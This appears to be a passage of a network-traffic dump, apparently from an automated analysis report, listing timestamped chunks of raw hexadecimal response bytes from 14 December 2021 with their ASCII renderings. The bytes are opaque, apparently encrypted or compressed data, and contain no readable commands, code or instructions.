                                                                                                  2021-12-14 15:13:05 UTC39INData Raw: bd bf b6 b4 19 5a 02 da 5e ef 5d a6 08 c2 b7 b3 60 09 f4 e6 0e 7e 7d bf fa e9 52 62 3e 54 8f bf 58 ae 0a 5a 61 07 e3 14 e5 24 16 bc 80 38 50 48 28 83 98 0f e4 63 78 4a 96 4a 10 a5 10 0e b6 55 e0 7b 1b 0e ef 29 1d 86 d8 bf fc 86 7b eb a8 c7 08 cd 47 93 32 5d f1 b2 4f f3 0a 6f f8 65 c9 28 77 fa 40 00 ff b2 35 e8 d4 d4 01 a1 0a 28 29 e0 d3 78 ef 26 11 3f e9 06 bd a5 65 9d c0 5b 21 9b dc 90 01 a4 9a 8a 04 1b 8d 10 06 71 93 34 3e fa 9c 65 8f 82 89 66 48 a8 48 9a f9 86 96 da c3 ed 80 40 09 62 24 fa ce aa d7 65 38 a2 e7 f1 de bc d4 95 cd 7e 58 da 97 96 5b 46 55 b2 51 08 26 d9 8d 80 c4 e5 13 7b d0 bb 65 00 99 aa d8 33 50 ae 44 a8 c8 7e 13 39 0a 84 ab d8 83 5b c6 87 fc 81 b8 b3 0f a9 0d b9 5b 32 c9 45 a9 b8 85 c4 db a7 6a 4a 8d 56 a9 69 a5 0a 6b 2c 51 73 d6 f8 8b
                                                                                                  Data Ascii: Z^]`~}Rb>TXZa$8PH(cxJJU{){G2]Ooe(w@5()x&?e[!q4>efHH@b$e8~X[FUQ&{e3PD~9[[2EjJVik,Qs
                                                                                                  2021-12-14 15:13:05 UTC40INData Raw: ea 8e 1e df ff e1 c0 0f 75 1b e1 27 7c 34 ce d5 65 4f 76 e0 15 04 6f 4a 96 e8 b0 8a 20 71 03 ac 3e 83 b8 2d ec 9c 91 cd 9e 3e 78 6e 24 c5 af 83 dd 49 5b f5 df d4 44 e4 da b4 ae 3f b5 07 5c e1 bc 75 e1 9e 2a 5b f9 68 f1 3c 54 64 35 38 f2 53 26 47 35 00 42 0e 9f c3 2a ff 4f 6f ff 49 f8 20 0e fe 6c d1 be 75 af 2c d0 a0 8d 6c c2 34 7e d5 4a b5 9b b7 3a 66 26 40 4a 8c 82 bc b3 5e 29 8a f2 92 09 36 37 69 bf 49 88 71 b9 1c f2 cb 08 ff 60 cc 96 72 51 95 aa 2a 7d c4 a5 58 cf 31 dc 17 ef 3f 89 c5 82 7b 5e 9c 91 69 15 8e f9 49 cd 0e 25 bb 07 5a 73 02 cd c6 06 9d 85 38 2b 71 29 a4 42 08 54 62 4c 75 55 20 1f 0b 5f 97 6a c3 29 42 9f fc 03 6b db e8 fe 8d a4 f1 6d 0c da 6a 72 c6 fa 7e 1a eb d5 25 92 fb e1 cd 9d 24 79 ad 89 64 b3 5a 0f d9 e8 9f e0 a2 b0 70 6b c0 95 4f 0d
                                                                                                  Data Ascii: u'|4eOvoJ q>->xn$I[D?\u*[h<Td58S&G5B*OoI lu,l4~J:f&@J^)67iIq`rQ*}X1?{^iI%Zs8+q)BTbLuU _j)Bkmjr~%$ydZpkO
                                                                                                  2021-12-14 15:13:05 UTC42INData Raw: 06 53 75 e6 fd 27 a5 ad 16 0c f1 ac ce 49 06 87 2e 29 d7 4c b3 98 0b 39 04 f7 32 32 25 0d 5a 0d 04 75 e0 bd f8 a0 b0 32 2a 13 de 20 5e e7 a6 02 bc 10 b5 48 cc f8 e0 0a 19 d4 38 fb e3 70 e6 50 dc 84 d0 c6 c0 83 51 72 08 da 0c f2 0c 7c 97 a7 3e 46 cf 40 4f 98 0e fa 66 68 0d f2 4a 10 a5 15 d7 68 78 fb 72 7f 30 fb 01 71 a9 d4 a8 ee 7e 47 eb a8 c7 73 8e 53 bb 9b 81 2f ad 42 ca 3d 6f f2 7c c0 37 e6 63 7f 00 fe b8 0b f8 41 d5 0b 75 21 30 57 37 cb f4 da 0c 16 14 ff 2e 29 b8 65 97 ee 55 f7 d2 be f8 03 9a 8e 8a 04 11 9e 17 2b 7d 39 fe 3e ef 84 4d 9b 83 9a 5c 58 af 09 88 f1 f8 b3 db c3 f6 85 5a 1a 48 6f e9 c7 82 b4 74 3d bc 95 cf f2 b5 a6 3a cb 6f 54 f8 d4 85 5e 4c 52 99 4d f0 2c 28 16 86 ec ca 02 72 d6 e4 ce 1d 8a a5 cb 28 44 ba a8 80 cc 19 28 c8 0c ac 3c c6 8a 42
                                                                                                  Data Ascii: Su'I.)L922%Zu2* ^H8pPQr|>F@OfhJhxr0q~GsS/B=o|7cAu!0W7.)eU+}9>M\XZHot=:oT^LRM,(r(D(<B
                                                                                                  2021-12-14 15:13:05 UTC43INData Raw: 72 e1 59 08 da 69 83 cf 3f 5b 37 f1 51 4a da 76 fa 56 e1 e0 3c 71 6c ae 72 9a bf 5f 8a 01 53 fb 47 17 4e e8 90 27 ff fd d9 c0 0f 7e ed e1 36 6f 23 42 c6 6c 2a 65 ff 24 3a 1a b6 6b 17 95 81 6e 2a 10 b1 2f 88 a9 07 d2 1d bd 32 6d 3c 77 5a 16 f2 af 82 cc 6a 74 dd 09 d4 44 ee 5e b4 a8 04 ad 21 d1 ca bc 34 d4 8d 22 4a f1 7e e7 3e 47 6c 22 43 6c 42 2e 54 26 9c 53 09 86 d5 b6 f4 47 75 e8 d5 e9 28 15 f9 f0 c0 b6 40 bc b0 c1 92 95 7a 5e 2a 76 cb 5c 33 8a bf 24 7c 00 db 5b 9d 9e b6 a5 a2 38 82 fc 8f 0c a0 1e 68 b7 4b 91 76 be 09 e0 1d 1f d2 6c c0 bc 5f e7 8a b0 e3 6c 0d 21 60 c5 31 cc 11 f2 3d 78 cc b8 70 e8 c7 8c 66 cf b9 f1 5b c7 04 47 26 19 4d 8b 10 e7 d0 2e ca ac 38 2b 6f 22 b2 40 86 f2 79 56 e8 1c fb 24 d8 70 89 e5 e8 29 5d 8a e2 01 63 44 55 fe 93 80 e1 44 0b
                                                                                                  Data Ascii: rYi?[7QJvV<qlr_SGN'~6o#Bl*e$:kn*/2m<wZjtD^!4"J~>Gl"ClB.T&SGu(@z^*v\3$|[8hKvl_l!`1=xpf[G&M.8+o"@yV$p)]cDUD
                                                                                                  2021-12-14 15:13:05 UTC44INData Raw: ca 07 07 1a fc 6f 2f 5b e1 32 eb 8b 24 49 d7 16 d1 a8 2f 81 10 c0 16 ac 4d d0 2c 3e 11 8e ac a6 7d eb 85 d8 59 60 ca ea 28 a0 86 3c 1d f1 bd d7 f1 0b 80 1c a3 d4 4d b5 f7 a6 39 18 b1 1e 2d 36 25 d1 0f 1f 43 87 41 b5 a5 ba 1f 71 1a d2 1a 23 4c a3 15 60 09 b6 71 0d e9 e6 82 c1 20 f6 f3 c1 18 76 51 da a6 33 51 c1 85 73 d4 0d cb 0f ec fa 05 b1 8f 0f 50 42 4d 5c 9c 7c 54 72 7c 2f 5b 62 28 af 3d cc b6 78 f7 55 6f 25 ef 29 1c aa d4 ae 8d 86 40 fe b2 c6 67 9b 5c a3 3c 81 a6 a6 6a db 5e 6f f8 7e db 22 d2 54 40 00 f4 91 90 d3 d4 d2 23 5b 0d 2e 4c 3e da 50 5c 0c 16 13 e2 75 06 b9 65 97 c8 5c 48 48 be f8 0b a1 95 9c 17 15 b5 5d 01 71 e9 a5 31 fe 88 ff 9c 87 8b 52 63 99 1f 9b f3 ab c4 e2 f1 fd 96 53 1d 5e 14 76 cf aa d1 67 3a 64 0b d5 da 82 a7 29 c7 6d 5a f8 b6 85 5e
                                                                                                  Data Ascii: o/[2$I/M,>}Y`(<M9-6%CAq#L`q vQ3QsPBM\|Tr|/[b(=xUo%)@g\<j^o~"T@#[.L>P\ue\HH]q1RcS^vg:d)mZ^
                                                                                                  2021-12-14 15:13:05 UTC45INData Raw: 9c d7 b7 25 cf 92 48 63 0a 71 6a 9b 40 7b fc 11 82 59 41 fc 84 cb bb f6 cd 3f c2 32 29 60 ba 22 1e ff 80 70 c6 36 8c b5 4f 8b dc 33 34 85 d9 d5 43 c9 78 83 6d ea 8f b2 76 7d 89 0a 58 ad 4c 93 d3 64 25 6f 20 4e f9 93 25 d4 fd 74 c3 0f 72 5c 6b 26 7c 32 bc 43 7c 3b 70 f8 27 2a 6f 4b 9e fe c4 5c 79 fc 03 ab 37 92 b4 05 7b 9f 41 cb fd 68 79 7f 38 d6 a9 93 cf 68 50 dd a9 d7 44 e2 ef 3e af 2e ac 18 db db b5 64 ec a5 bb 49 f1 78 88 2a 44 6c 24 06 d6 42 2e 59 30 94 42 0e 92 2b b7 ff 4f 0b 7a d5 e9 22 03 c0 de c0 b6 63 af 4e c0 c8 bc 5f 4f 22 5a ea 74 6e 8b bf 2f 7e 39 cd 57 ac ff b5 a5 c4 57 08 ec 99 19 c5 be 61 b4 41 80 71 87 b4 fe e3 18 ed 68 d7 92 d4 69 8b ba fa 47 51 39 79 e7 be dc 1b e7 0d bc dc 9c 55 e6 58 ac 64 cf a0 fc 45 dc 09 47 2a 69 72 77 11 cd c8 1b
                                                                                                  Data Ascii: %Hcqj@{YA?2)`"p6O34Cxmv}XLd%o N%tr\k&|2C|;p'*oK\y7{Ahy8hPD>.dIx*Dl$B.Y0B+Oz"cN_O"Ztn/~9WWaAqhiGQ9yUXdEG*irw
                                                                                                  2021-12-14 15:13:05 UTC47INData Raw: 10 a4 92 42 e8 ad c8 a6 e7 48 37 7d 68 10 e7 91 0a fe 71 35 a7 3d e4 3c 2d f6 48 34 be 61 85 43 03 a7 bc d9 00 25 91 be 6c 29 4e c4 9e e6 a3 8b 41 ff 3e c0 a4 3b 81 3f c6 88 ac 4b c9 0f a5 19 9f ad a0 52 2e 80 d9 53 79 de fe 13 62 ad 16 0a e4 a4 d4 43 51 8b 34 2f b8 65 b1 98 3d 3f 09 bc 5d ee 3f 0d 50 63 3b 47 e8 bb b3 8d 27 32 75 19 cf 37 42 8f a6 02 bc 32 d5 61 08 f2 8f 1b 77 12 32 94 cf 5a 75 57 da a6 19 51 c1 85 34 4b 0f cb 0f e0 2f ce 81 82 10 67 42 47 45 8b 06 9d 50 7e 25 57 41 38 97 3d c6 62 a6 f1 78 44 34 ff 29 1c aa d4 a8 f8 00 b9 eb bd dc 67 9a 46 88 08 82 2f fb 6a db 3d 31 f8 6f d5 4d 40 ef 40 0a f4 bf 63 fc d5 d4 0f 57 1a 2c 46 35 fb 2a e6 0c 10 3d f1 04 bc bf 0a 5b c2 5b 2d 45 b0 dd 29 85 9a 8a 0e 17 a5 28 00 71 e3 6a 3e e9 f8 49 8e 83 9e 7e
                                                                                                  Data Ascii: BH7}hq5=<-H4aC%l)NA>;?KR.SybCQ4/e=?]?Pc;G'2u7B2aw2ZuWQ4K/gBGEP~%WA8=bxD4)gF/j=1oM@@cW,F5*=[[-E)(qj>I~
                                                                                                  2021-12-14 15:13:05 UTC48INData Raw: c1 c9 69 81 f2 33 3b 2c d1 96 c7 af 3f 6d 22 fc e6 93 ed 6d d5 16 81 57 af 96 59 39 41 83 01 e2 f7 79 c3 99 ef f9 0c 66 91 59 60 0a 61 6b 9b 40 3c ee 10 82 59 25 77 ad fa b1 de 71 06 14 34 3a 67 c3 c2 93 fe 8a 65 d3 4e c1 a1 6a a9 f8 39 4a 1c ca d2 4f d7 58 ad 7c e3 ea e7 51 7f 8f 1d 93 b8 77 2a dc 5c d8 00 a7 4f e8 9c 19 da d3 cb d6 1e 72 5c 69 26 7c 32 83 0f 6c 2d 65 e6 37 88 6f 4b 94 f9 82 9b 71 eb 6c 33 3f 83 be 3e e5 8d 47 dc 9a f8 17 f6 3f c5 a9 91 cd 68 5a e4 39 cd 2b 6d 81 b4 a8 3d a0 1a d8 e2 33 74 e0 87 0f 02 e0 75 cf 2f 44 6c 28 03 51 53 24 77 ac 9d 53 0c ab e3 c5 cc 45 75 ef c6 e5 39 19 f9 f9 af 9e 6b b9 b6 d0 a4 81 71 31 01 74 cb 5a 38 86 ae 2f 00 16 de 5b 82 8c ba 8d 69 3b 82 eb f6 35 a8 26 67 b2 5a 9d 19 b7 02 fe e9 c0 f1 45 ee a3 fc e6 80
                                                                                                  Data Ascii: i3;,?m"mWY9AyfY`ak@<Y%wq4:geNj9JOX|Qw*\Or\i&|2l-e7oKql3?>G?hZ9+m=3tu/Dl(QS$wSEu9kq1tZ8/[i;5&gZE
                                                                                                  2021-12-14 15:13:05 UTC49INData Raw: 0a 8b bf d5 e1 be b6 db 80 de 15 23 90 be 39 f5 c0 0f bf 50 f1 a3 bc fe 30 cd ed 87 7e 4a 98 35 12 b3 53 3e ac a8 35 04 5f 25 75 f8 5c 31 85 11 08 e6 91 1b 83 24 1d 60 37 38 2b 2f c1 6a 26 b1 70 f9 50 14 99 f6 35 f8 f2 34 d2 af 2e 5d c3 e3 2f 8a 2e 48 ec 20 f8 f6 3b 95 3f 2d 8b ac 47 c9 17 a6 01 e1 8f b3 55 47 eb 11 53 73 c6 eb 0a e3 de 34 0e f7 aa c1 7f 17 9d 25 3a b8 6a b1 98 3d 56 30 b9 32 3a 2e 19 4b 1f 70 66 ea bd b3 ca 94 30 75 15 cf 25 3c 4e c9 27 b4 1a b5 0f 2e fa e0 0a 67 06 10 40 ea 58 73 3e f6 8c bf 54 d0 87 4a 75 62 d3 08 e6 2e 02 8c 8f fe 51 42 4d 62 01 d1 e0 60 64 db 47 54 10 af 26 a9 3f 78 f1 75 b2 24 eb 03 1c aa d5 86 f8 f3 42 eb 54 c6 ca 33 46 9d 38 81 2f a7 68 db e4 6e 5b 13 c6 30 fa ef 40 00 fc b9 84 d2 ac c5 08 71 0d 2e 46 33 c8 48 ef
                                                                                                  Data Ascii: #9P0~J5S>5_%u\1$`78+/j&pP54.]/.H ;?-GUGSs4%:j=V02:.Kpf0u%<N'.g@Xs>TJub.QBMb`dGT&?xu$BT3F8/hn[0@q.F3H
                                                                                                  2021-12-14 15:13:05 UTC50INData Raw: 4d 41 3b 56 2c 07 f8 7d 1c c2 cd 02 07 23 17 2b 70 3b b2 4e 97 e7 65 5e 67 f3 fe 20 72 48 41 ed f9 2d 54 0e dd 2e 6a 43 c5 c9 8c 7e e0 62 ca fa 7a 5a d1 d3 6a 10 e3 c9 04 b0 f2 6f 70 f5 1e f7 1a 52 3d 9a 5b 0f d2 3e 03 e3 a2 ce 73 6d c3 89 71 04 58 e5 50 df 8c dd d7 43 a7 11 49 f3 9a ff 07 eb a4 10 ac 87 b6 88 0f d4 59 ce 13 1a f1 f7 c1 77 94 94 8f 9b b1 1c c3 02 65 f8 78 04 2c bd 23 2d 8a b2 a9 0c 3b e1 3d c8 8c d1 40 a4 17 8f 24 75 a0 b4 c4 f7 be 74 d9 80 de 15 a3 91 be 39 f5 f7 0f bf 50 f1 1d bc fe 30 7c c5 a0 56 7b 8a 22 30 7c 7a 06 a6 92 4e 25 a0 dc 81 f7 52 26 7b 07 14 e0 91 1c ce 73 13 7a 3d e4 3b 20 d6 8c 35 a2 2d f6 4f 18 a7 b6 cb 1c 3d 3b bd 88 2d 5d c9 e0 eb 8b 3f 31 45 38 d3 a2 23 f3 84 e8 8a a6 41 a4 97 b7 12 84 b9 b4 2b 6f 85 d8 57 5b db fe
                                                                                                  Data Ascii: MA;V,}#+p;Ne^g rHA-T.jC~bzZjopR=[>smqXPCIYwex,#-;=@$ut9P0|V{"0|zN%R&{sz=; 5-O=;-]?1E8#A+oW[
                                                                                                  2021-12-14 15:13:05 UTC51INData Raw: 0c 66 c1 65 3f ef 8c 4d 5a 82 9a 5c 63 65 1c 9b ff 8e d6 0c d4 d4 47 52 0c 50 4f 2e cf aa dd 15 15 69 18 f0 f8 9d 73 28 cd 74 7a 06 8f 85 54 4e 53 61 54 ab 2b e4 8a 95 3a d9 1f 6a d6 86 48 2d 3d be df 4d 9c b0 ba a3 f2 44 29 16 7c f7 89 c5 8a 4e d0 8d fc 8e 8d 83 0d 85 0e c0 7e 2e da 46 b8 a3 91 df 4a 82 44 41 89 6f 29 79 a1 6f 5e 2a 4c 66 c2 f2 b2 bd 23 c0 54 f2 1a c6 8b dd 40 87 c6 d8 87 b1 af 3a 43 02 ab 12 52 2a 44 72 33 3c a6 1e 1c cf 50 87 38 22 df fb 1f 19 71 8e c2 7d f8 32 ba fb 20 5b 14 38 55 c0 a4 30 74 58 d3 33 af 89 8d b7 b2 79 41 14 f8 38 19 7b 64 97 cd 7b 52 ec 09 fb c6 84 82 e5 95 22 8b 38 24 97 59 33 0b 86 09 f3 91 50 58 99 53 f2 24 cf 84 59 66 22 fa 6b 9b 4a 14 72 10 82 55 2e 70 85 05 b0 de 7b eb c3 34 3a 72 c4 b1 1e e5 8a 63 c1 5b 2f b0
                                                                                                  Data Ascii: fe?MZ\ceGRPO.is(tzTNSaT+:jH-=MD)|N~.FJDAo)yo^*Lf#T@:CR*Dr3<P8"q}2 [8U0tX3yA8{d{R"8$Y3PXS$Yf"kJrU.p{4:rc[/
                                                                                                  2021-12-14 15:13:05 UTC53INData Raw: a7 12 f6 f2 17 70 d7 f9 6d 02 19 75 64 e5 4f 3a 1f 73 cf 3b ce 1c 9e 9a 86 cd 9e 72 f8 13 8e 66 c5 78 ed 4e e7 03 7c 2c 47 16 75 11 cb d9 16 10 c6 38 2b 70 49 a1 4a 86 38 73 49 fb ee fa 08 d1 52 41 e7 e9 2b 42 9e f1 30 63 55 5f 5b 9d 7e e0 9d 1a c5 7a 4c d0 fb 7e 10 e3 c3 2c 84 f3 6f 7a 8a 21 f7 1a 4b 4d a5 5b 11 d2 c0 08 f5 a2 ba 61 77 c3 92 5a 1f 68 e6 4b af 8e dd 8b 32 a7 11 06 80 20 ee 74 5b ae 6e 9a 8d b0 fc 0c 02 5a ca 3d 1a 9c ca c7 5f ce ba 88 9b 92 d9 de 03 63 97 60 10 09 9f ca 23 af 90 8d 08 3d e0 19 d8 b4 d1 4a 73 c0 8e 22 0b f5 89 c4 f3 9c 4b 0c 83 d8 3b e4 fd 83 3f dd e4 01 b7 39 2f da bc f4 37 ab d8 8b 68 5f 87 1a f8 71 52 3e b7 9c 55 f6 3a c9 ae 88 72 26 7b 0d 3c 3e 92 00 ea 62 18 48 19 e4 3a 2a c1 d3 08 be 61 fc 52 04 8f a4 cb 07 07 23 bb
                                                                                                  Data Ascii: pmudO:s;rfxN|,Gu8+pIJ8sIRA+B0cU_[~zL~,oz!KM[awZhK2 t[nZ=_c`#=Js"K;?9/7h_qR>U:r&{<>bH:*aR#
                                                                                                  2021-12-14 15:13:05 UTC54INData Raw: d6 c5 d1 23 9a 0e 2e 40 26 c5 50 a1 0d 16 1f fe 9c 94 5f 66 9d c4 4e 31 b3 fa f9 01 b8 8c 10 2c 3c 8d 10 0a 1e c1 b6 3e e9 97 60 a7 64 99 56 4d c7 82 9b f9 8c ed ff d2 fa 87 56 24 bd 64 fb c8 bf c1 5c 79 bb 19 fa e5 2f 8f c1 ce 7e 54 c5 98 ad 1a 47 44 bd 5c 6c 48 d1 84 82 ea db 16 53 33 94 58 1a e5 32 d8 22 5f 9c 8b b8 e2 66 2e e0 e3 87 ab c1 9f 5e eb c3 ec 84 af 5a 94 ad e2 ac 56 2a cf 56 81 ed 81 d8 2f b0 dc 69 8c 7f 23 6e 8d 9c 78 28 46 0f f5 fa 9a 74 0b f3 43 98 18 2f 88 db 40 f9 51 b7 9f ba 83 15 43 0a d5 d0 7a c1 4d 48 98 d7 4f c9 86 d8 41 83 5a 83 f7 11 1d 35 7b 8a da 20 87 33 ba f0 59 96 7b 1e 5d 1c 7c 34 57 58 08 30 af 85 f1 90 c3 c3 47 12 e3 35 5e 5b 65 97 cd b4 5a 85 e4 fc ec 8e b8 2e 2a e9 74 e6 30 86 53 46 69 86 09 f2 de 5d 49 93 9a c8 24 cf
                                                                                                  Data Ascii: #.@&P_fN1,<>`dVMV$d\y/~TGD\lHS3X2"_f.^ZV*V/i#nx(FtC/@QCzMHOAZ5{ 3Y{]|4WX0G5^[eZ.*t0SFi]I$
                                                                                                  2021-12-14 15:13:05 UTC55INData Raw: eb c2 a8 90 7a 4f 37 6f 35 5d 05 83 cc 9f 6f 30 d6 51 9e 8e a4 a5 d3 2a 9c 13 98 33 ad 2f 72 ba 54 98 65 bd 03 ef f1 01 f5 9e c7 b8 f7 f7 84 ab fd f0 01 2f 6c c3 22 cf 1b fc 32 99 d0 6a 78 fc 21 9f 6c d8 3c fc 4e d2 1a 45 3e 06 4b 67 0e d5 27 17 3c a4 29 3b 67 ec b2 5a 99 fc 60 5b fb f3 e8 17 f3 b6 40 cb e5 38 4a 8f f7 64 47 57 5f e7 82 5d f3 7a 1a d4 68 45 f7 05 7f 3c ef d2 21 95 fd e1 cd be 89 e8 32 40 5e a5 4a 1d c9 3e 09 cc ab c4 f2 6d c3 98 57 1f 4b f7 4b fe 9d c2 9c bd a6 3d 06 e2 96 81 bd 51 a4 1a be b3 3e f4 24 d5 46 d2 28 1f f3 e6 d5 40 cb 69 8e b1 90 3c 77 02 63 97 a1 14 3f a5 fd 32 bd 85 97 f2 3a c7 36 f6 a7 dc 5f a4 da 9d 22 1a 99 ae 3a f2 ba 69 a5 13 d8 3d f9 81 b8 23 ce fc 0d ae 44 82 25 bd d2 30 dc 58 85 7e 46 99 27 27 62 40 3e b7 80 5b ee
                                                                                                  Data Ascii: zO7o5]o0Q*3/rTe/l"2jx!l<NE>Kg'<);gZ`[@8JdGW_]zhE<!2@^J>mWKK=Q>$F(@i<wc?2:6_":i=#D%0X~F''b@>[
                                                                                                  2021-12-14 15:13:05 UTC56INData Raw: c7 04 1f aa d2 bf f4 e2 4e 71 80 e1 67 9a 4d 80 32 90 21 b0 bc c8 33 7e f6 7e d2 00 83 10 bf ff ef b3 72 ce d5 d4 01 68 80 71 46 33 d2 6b f0 1d 03 03 f6 0b 21 a8 70 f2 8b 5a 27 91 ad f3 17 a3 91 04 b3 03 57 03 17 62 f9 8c e4 ef 86 65 9e 88 8b 46 d1 80 18 9f f9 80 ae 26 c3 fc 9c 42 07 4b 77 61 e6 a2 d3 74 3b d5 fa f1 f2 bf b1 d7 cf 21 7e c8 9f 8e 4f 56 de a1 5b fd 36 e5 1c ed 25 ca 13 71 c2 4d 37 f3 8a af d2 2e 44 bb ab b9 7e 5f 22 cc 0a 82 c4 3b 8a 48 c9 96 e6 95 b5 5a d8 1f 20 a5 52 2c dc 2f 55 a9 80 d2 7a 8a 33 50 84 6f 33 f2 b3 11 73 39 5c fa bc 31 9a 72 2a d7 88 f2 df c4 8b d1 55 93 dd bc 8e a0 b8 e6 c8 1a d5 de 43 3a 59 9e 04 ad 90 e1 c2 d3 59 53 22 f6 df fb 14 26 7b ec ee 0a c3 34 a9 eb 5e 09 7b f1 5f 1c 70 3f 60 5e f5 22 a7 ec b6 b8 c1 c5 50 05 e3
                                                                                                  Data Ascii: NqgM2!3~~rhqF3k!pZ'WbeF&BKwat;!~OV[6%qM7.D~_";HZ R,/Uz3Po3s9\1r*UC:YYS"&{4^{_p?`^"P
                                                                                                  2021-12-14 15:13:05 UTC58INData Raw: dd b5 0e a0 f2 85 6d 5b 22 2e 64 51 24 2c 99 9c 53 0c 8d fd 8e ee 47 7f 37 d7 ef 02 12 c2 f0 c0 b7 79 b9 b0 c1 a8 96 7a b9 c8 76 de 46 29 8a be 3e 5f 34 dc 72 85 9d b6 d3 c2 38 93 9e 23 1f aa 2c 6b 9c f2 93 76 a9 2b 36 e3 1e f4 48 df 90 fc e0 a2 03 f2 6a 14 00 bb cf 31 d7 33 f7 24 86 cb bc 5d d0 2b 84 70 e7 41 ee 48 c7 2c 71 2c 06 50 66 14 da dc 3e 21 ae 38 21 5d 31 d2 f0 86 e3 79 42 26 3f fa 08 d1 59 44 cf b4 29 42 98 fc 02 4b b7 5c e1 9b 56 03 6b 1a c3 52 07 d0 fb 78 03 e7 ca 04 61 f0 6f 7c a4 c7 f4 1a 55 64 f8 5b 0f d5 d3 0e e9 8a 5d 62 6d c5 ba b3 07 58 e3 63 b2 8f dd 8d 50 af 18 3f e8 9e ee 72 79 b8 14 a6 8b 98 ab 24 d5 5f d9 3c 04 db ea c3 5f c2 bf 91 99 99 02 e9 5f 63 97 b8 08 3d bf d5 0d ad 9a 98 1a 13 c5 31 e0 be c7 6e fd ba ad 20 0b 8d a6 cd e2
                                                                                                  Data Ascii: m[".dQ$,SG7yzvF)>_4r8#,kv+6Hj13$]+pAH,q,Pf>!8!]1yB&?YD)BK\VkRxao|Ud[]bmXcP?ry$_<__c=1n
                                                                                                  2021-12-14 15:13:05 UTC59INData Raw: d2 85 63 d8 0d cb 09 ef 30 38 29 a4 38 56 5a ca 48 98 0f ef 61 74 34 59 5c 01 a9 25 1e e4 47 f1 7f 6f 97 fe 21 0b b2 58 91 f8 f3 41 49 b9 ce 73 8e 53 bb 9b 81 2f ad 42 ca 3d 6f f2 7c c0 39 ee c7 fd 03 fe bf 05 5d d3 d4 0b 7e 1e 26 57 3b c5 63 f4 0a c0 99 d6 06 bc b8 c7 8c ca 4c 3b 8a b8 2e 1a a3 9c 5c de 97 b2 10 00 70 4b a5 36 fb 92 71 a7 20 9a 56 41 80 0e 9b f9 8c d2 dd d2 f8 be cf 0c 5a 6d e4 de 82 3e 75 3d b0 08 f6 28 a2 7d 36 e2 6f 55 f8 12 85 5e 4c 5b a7 62 1f 26 f5 8c 54 f3 f3 4e a1 c9 92 50 0d 8f 87 32 23 55 ba 36 f6 e4 77 2a e0 39 85 ab cd 86 59 c5 90 3b 97 a3 5c 08 94 01 91 68 d3 25 bf a1 81 1c d8 25 ac 4c 9f 9d 56 14 68 a5 0a 50 06 4e 60 d5 f2 b2 4a 20 c0 58 43 30 c2 a1 db 46 d7 d0 b7 9f b0 af 30 52 0c c4 d5 52 50 4f 48 9e b8 58 e1 c2 cb 41 89
                                                                                                  Data Ascii: c08)8VZHat4Y\%Go!XAIsS/B=o|9]~&W;cL;.\pK6q VAZm>u=(}6oU^L[b&TNP2#U6w*9Y;\h%%LVhPN`J XC0F0RRPOHXA
                                                                                                  2021-12-14 15:13:05 UTC60INData Raw: 8a af fb ff 95 50 c4 83 e8 f6 c8 01 40 51 7d 39 7e 76 f5 31 95 70 e4 80 b4 ae 2e aa 76 d1 ca bc 8a e0 8d 22 36 f0 7e e7 af 45 6c 22 34 6e 42 2f 5d 23 9c 53 5a 86 d5 b6 d3 46 75 e9 4c e8 28 15 fe f0 c0 b6 69 b9 b0 c1 b3 a0 7e 5e 64 77 cb 5c a9 8a bf 34 1c 8a dc 5b 8e 96 9e 9a c6 38 84 e0 b1 5f ae 26 67 be 42 b9 37 ab 03 f8 cb 30 fc 60 c0 bc 19 e7 8a b0 d8 f6 12 28 79 dc 37 d4 33 7b 23 86 cb bc 57 d2 2b 88 4e 2a a7 ef 42 e5 98 56 2c 0c 49 71 17 e3 36 15 10 a8 10 05 72 3a a7 62 63 e2 73 43 d3 7e fa 08 db 5b 46 e1 c0 bf 41 9e f7 23 4d 57 5f e7 b5 9b e1 68 10 ed e6 5a d0 f1 6d 15 f2 c5 04 aa f1 6f 7c 9a 09 d9 1a 53 46 b3 a5 0e c2 c7 20 ce a0 ba 67 7b eb bc 5b 04 52 f3 b5 ee d0 f1 8c 57 ab cc b0 f3 9a ee 65 57 8c 3e a4 8d b6 e0 0c fb 59 ca 31 1b dd b7 b4 7d c6
                                                                                                  Data Ascii: P@Q}9~v1p.v"6~El"4nB/]#SZFuL(i~^dw\4[8_&gB70`(y73{#W+N*BV,Iq6r:bcsC~[FA#MW_hZmo|SF g{[RWeW>Y1}
                                                                                                  2021-12-14 15:13:05 UTC61INData Raw: 1a e8 bd b4 b6 a4 23 61 05 c8 ac 3c 49 c9 4b b7 1a b9 77 92 eb eb 1d 7c 7d f1 fb e9 52 63 af de 9f b4 3d 08 83 5b 6b 1b 35 0b b9 08 35 85 ac 10 a0 42 47 49 8b 0b ff 78 54 d5 51 4a 16 a4 2c ca 7e e2 d9 af 6c 35 e9 01 32 a8 d4 a8 97 8b 40 eb a2 ca 76 9e 28 5a 38 81 25 b0 94 d9 3a 00 31 6f c4 34 ed 11 42 5f d2 8d 6e f2 d6 d4 0d 6c 00 3f 4b 3b bc 50 e7 0c 10 04 e4 17 b8 d6 41 9f c2 5d 36 96 b9 97 27 b0 9a 8c 15 16 a5 58 04 71 ef db 14 ed 86 63 89 92 97 39 53 a9 1f 91 27 93 e4 f2 f4 fc 96 59 1f 54 14 41 ce aa dd 79 15 82 19 f0 f8 6b 9e 38 dc 69 84 c3 9f 94 4f 57 56 39 fd c9 ff 0b 79 7d fd cc 04 ad c9 91 49 1a 9b bf e6 a9 ab 4f 45 77 f1 52 03 ff 0a 84 a1 d4 85 3b 79 87 ed 8e a8 65 36 85 08 a5 88 2e dc 6a a0 83 80 d8 64 92 46 41 8f 7e 23 68 60 00 78 28 91 60 d3
                                                                                                  Data Ascii: #a<IKw|}Rc=[k55BGIxTQJ,~l52@v(Z8%:1o4B_nl?K;PA]6'Xqc9S'YTAyk8iOWV9y}IOEwR;ye6.jdFA~#h`x(`
